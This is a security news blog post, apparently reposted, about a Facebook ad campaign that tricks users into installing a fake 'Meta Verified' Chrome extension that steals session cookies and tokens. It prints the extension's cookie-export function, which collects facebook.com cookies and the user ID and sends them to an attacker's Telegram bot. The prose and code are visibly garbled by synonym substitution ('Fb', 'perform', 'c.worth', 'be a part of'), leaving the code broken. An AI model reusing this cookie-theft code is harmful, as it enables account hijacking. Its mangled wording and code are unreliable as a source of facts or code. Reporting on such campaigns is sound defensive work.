Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
Beware of Malicious Facebook Ads With Meta Verified Steals User Account Details

Beware of Malicious Facebook Ads With Meta Verified Steals User Account Details

Posted on September 10, 2025September 10, 2025 By CWS

Malicious actors have launched a classy malvertising marketing campaign on Fb that coerces unsuspecting customers into putting in a pretend “Meta Verified” browser extension.

Promoted by way of seemingly legit video tutorials, these advertisements promise to unlock the coveted blue verification tick with out paying Meta’s subscription price.

In actuality, the extension is engineered to reap delicate consumer knowledge, together with session cookies, entry tokens, and IP addresses.

By leveraging trusted platforms like Field.com for internet hosting, attackers guarantee excessive availability and evade easy URL-blocking defenses, making the rip-off seem each genuine and risk-free.

Upon nearer inspection, the video tutorials accompanying the advertisements bear the fingerprints of Vietnamese-speaking menace actors, with narration and code feedback written in Vietnamese.

The extension’s code, though clumsily obfuscated and certain generated by an AI-assisted toolkit, nonetheless successfully exfiltrates knowledge.

Bitdefender analysts recognized using the Fb Graph API to question Enterprise account data as soon as legitimate entry tokens are acquired, permitting attackers to differentiate high-value company profiles from private accounts.

Malicious browser extension advert (Supply – Bitdefender)

Victims who comply with the tutorial unwittingly grant the extension permissions to learn and export cookies from the fb.com area.

As soon as put in, the extension instantly invokes an exportCookies perform that compiles each cookie right into a formatted string earlier than transmitting it to a Telegram bot managed by the attackers.

Cookie export perform (Supply – Bitdefender)

To additional personalize the stolen knowledge, the malware queries to append geolocation particulars, bolstering its marketability on underground boards.

Bitdefender researchers famous that variants of this extension embody adjustable parameters for tick dimension and place, suggesting an automatic pipeline for producing new marketing campaign property with minimal guide effort.

The modular design additionally helps automated execution upon Chrome startup, guaranteeing persistent knowledge harvesting even when customers disable and re-enable the extension.

An infection Mechanism Deep Dive

The core of the an infection mechanism lies within the malicious extension’s background script, which hooks into Chrome’s cookies API to extract session tokens with out triggering consumer prompts.

After set up—triggered by clicking on an advert hyperlink—the extension makes use of chrome.cookies.getAll({ area: “fb.com” }, callback) to assemble cookies.

Inside the callback, it constructs the payload:-

async perform exportCookies() {
chrome.cookies.getAll({ area: “fb.com” }, async cookies => {
const cookieString = cookies. Map(c => `${c.identify}=${c.worth}`).be a part of(“;”);
const userId = cookies. Discover(c => c.identify === “c_user”)?.worth || “Unknown”;
const ipInfo = await fetch(”).then(r => r.json()).catch(() => ({}));
const payload = `ID: ${userId}nIP: $ “Unknown”nCookies: ${cookieString}`;
sendToTelegram(payload);
});
}

This streamlined method bypasses many endpoint-based detections, whereas using legit domains for internet hosting and command-and-control reduces the probability of speedy takedown.

Safety groups ought to monitor irregular cookie export exercise and implement rigorous extension vetting to defend in opposition to such industrialized malvertising threats.

Enhance your SOC and assist your staff defend what you are promoting with free top-notch menace intelligence: Request TI Lookup Premium Trial.

Cyber Security News Tags:Account, Ads, Beware, Details, Facebook, Malicious, Meta, Steals, User, Verified

Post navigation

Previous Post: Chinese APT Deploys EggStreme Fileless Malware to Breach Philippine Military Systems
Next Post: AsyncRAT Uses Fileless Loader to Bypass Detections and Gain Remote Access

Related Posts

PoC Exploit Released for Windows Server Update Services Remote Code Execution Vulnerability PoC Exploit Released for Windows Server Update Services Remote Code Execution Vulnerability Cyber Security News
Threat Actors Leveraging Windows and Linux Vulnerabilities in Real-world Attacks to Gain System Access Threat Actors Leveraging Windows and Linux Vulnerabilities in Real-world Attacks to Gain System Access Cyber Security News
Threat Actors Weaponize Malicious Gopackages to Deliver Obfuscated Remote Payloads Threat Actors Weaponize Malicious Gopackages to Deliver Obfuscated Remote Payloads Cyber Security News
New ClearFake Campaign Leveraging Proxy Execution to Run PowerShell Commands via Trusted Window Feature New ClearFake Campaign Leveraging Proxy Execution to Run PowerShell Commands via Trusted Window Feature Cyber Security News
One Identity Safeguard Named a Visionary in the 2025 Gartner Magic Quadrant for PAM One Identity Safeguard Named a Visionary in the 2025 Gartner Magic Quadrant for PAM Cyber Security News
100+ Cisco Secure Email Devices Exposed to Zero‑Day Exploited in the Wild 100+ Cisco Secure Email Devices Exposed to Zero‑Day Exploited in the Wild Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Muddled Libra Exploits VMware vSphere in Cyber Attack
  • Feiniu NAS Devices Targeted in Major Botnet Attack
  • Rapid SSH Worm Exploits Linux Systems with Credential Stuffing
  • Odido Telecom Hacked: 6.2 Million Accounts Compromised
  • Lazarus Group Targets npm and PyPI with Malicious Packages

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Muddled Libra Exploits VMware vSphere in Cyber Attack
  • Feiniu NAS Devices Targeted in Major Botnet Attack
  • Rapid SSH Worm Exploits Linux Systems with Credential Stuffing
  • Odido Telecom Hacked: 6.2 Million Accounts Compromised
  • Lazarus Group Targets npm and PyPI with Malicious Packages

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News